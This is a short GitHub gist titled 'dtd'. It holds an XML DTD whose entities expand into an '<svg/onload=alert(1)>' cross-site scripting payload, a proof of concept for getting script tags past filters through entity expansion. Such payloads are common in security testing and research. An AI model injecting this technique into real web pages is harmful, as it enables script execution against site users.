Skip to content

Instantly share code, notes, and snippets.

@Creased
Last active May 3, 2017 12:08
Show Gist options
  • Save Creased/9b11bba5ba130628df20cb1a7fff8a98 to your computer and use it in GitHub Desktop.
Save Creased/9b11bba5ba130628df20cb1a7fff8a98 to your computer and use it in GitHub Desktop.
dtd
<!DOCTYPE html [
<!ENTITY lt "<">
<!ENTITY ob "svg">
<!ENTITY at "onload">
<!ENTITY pa "alert">
<!ENTITY va "1">
<!ENTITY gt ">">
<!ENTITY xss "&lt;&ob;/&at;=&pa;(&va;)&gt;">
]>
<html>&xss;</html>
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment